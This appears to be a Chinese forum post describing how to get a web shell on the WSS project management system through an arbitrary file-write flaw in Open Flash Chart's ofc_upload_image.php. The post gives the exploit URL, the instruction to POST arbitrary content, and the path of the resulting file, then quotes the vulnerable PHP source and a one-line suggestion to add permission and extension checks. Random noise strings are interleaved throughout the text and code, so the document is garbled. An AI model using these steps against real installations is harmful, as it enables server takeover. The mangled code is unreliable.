WSS项目管理系统Post get shell

admin

POST 数据漏洞文件执行任意后缀文件保存
漏洞文件/chart/php-ofc-library/ofc_upload_image.php
% ]) r" E6 S) b$ n6 y3 H" `- a
利用：
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名
" E7 P# n1 a9 t5 v% ?. s% D
Post任意数据
/ b' X% X/ a) z' m( E, a保存位置http://localhost/chart/tmp-upload-images/hfy.php
& Q  e: G5 I  u5 b- R
% O/ D& \& O5 r+ ^. A, N) X9 }% Q& [# W
最新版wss漏洞文件，即使是收费版本也有的，在新浪商店部署的demo~
/ W/ N$ L7 x& u. x
<?php
# X, J- G' d. a/ T. `
, d8 U1 R' @& O# `' m) p* v2 f//
// In Open Flash Chart -> save_image debug mode, you
- ?& w  ^& A6 f5 G, {// will see the 'echo' text in a new window.
//

5 F8 s6 w' v# ~  ?/ V' p! _/*
* i2 v5 h* c( Z8 s% Z: q
print_r( $_GET );
9 q7 ~+ D9 T+ r+ F# `& O( _5 jprint_r( $_POST );
" T7 ^; ?" J& i: Qprint_r( $_FILES );

% \( C3 X( ^) ]% q" j: G, D& k6 Tprint_r( $GLOBALS );
% S# N) s& y  I0 M* o( \8 Oprint_r( $GLOBALS["HTTP_RAW_POST_DATA"] );
. W, s* J9 a8 L: G
*/
// default path for the image to be stored //
$default_path = '../tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
$destination = $default_path . basename( $_GET[ 'name' ] );

echo 'Saving your image to: '. $destination;
// print_r( $_POST );
// print_r( $_SERVER );
// echo $HTTP_RAW_POST_DATA;

//
3 N: ^  V7 r+ }// POST data is usually string data, but we are passing a RAW .png
// so PHP is a bit confused and $_POST is empty. But it has saved
3 f' i- b5 X# F7 q8 X. ?// the raw bits into $HTTP_RAW_POST_DATA
3 b' ~  S" z4 D% q4 O//

$jfh = fopen($destination, 'w') or die("can't open file");
$ H7 _, v( N3 {7 j$ Q3 Wfwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);
4 _, v3 i% e. J  U& Q1 D
//
2 y, u7 B1 e, m" Q' a// LOOK:
//
exit();
//
// PHP5:
" N: }$ U. I% d2 |; _8 i7 W* C% ^//


1 z+ Z' o+ G7 ^5 d- V% P1 f// default path for the image to be stored //
$default_path = 'tmp-upload-images/';
( I; s1 N, U% p6 {) E& c) D
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
5 n4 ~8 G! F/ Q- l
/ N0 p- ~+ _* I  V7 m, o! d9 K// full path to the saved image including filename //
, L" D. A- ~+ Z, c+ i+ ~! O8 W( w$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );

// move the image into the specified directory //
( {  G% ?5 X5 s- H, x/ f4 o9 I4 qif (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
8 s; H. X% a1 S  \3 y    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
! i, g! _% X5 N0 B9 O} else {
    echo "FILE UPLOAD FAILED";
% _  [5 G7 Z, _" q8 e) u}
" k, K, Z5 {6 L& G+ d0 E/ b
4 \/ D2 }7 Y+ ?; }
?>

3 a; @& }5 w2 N1 L- T


+ x, k, A3 v1 s" m

修复方案：
! A+ m/ N9 P' g  \. c8 P这个漏洞文件就是个杯具，怎么破，加权限验证，后缀等验证~，自己搞
/ j2 `2 s, X% \+ ~
. w4 {9 p+ g* r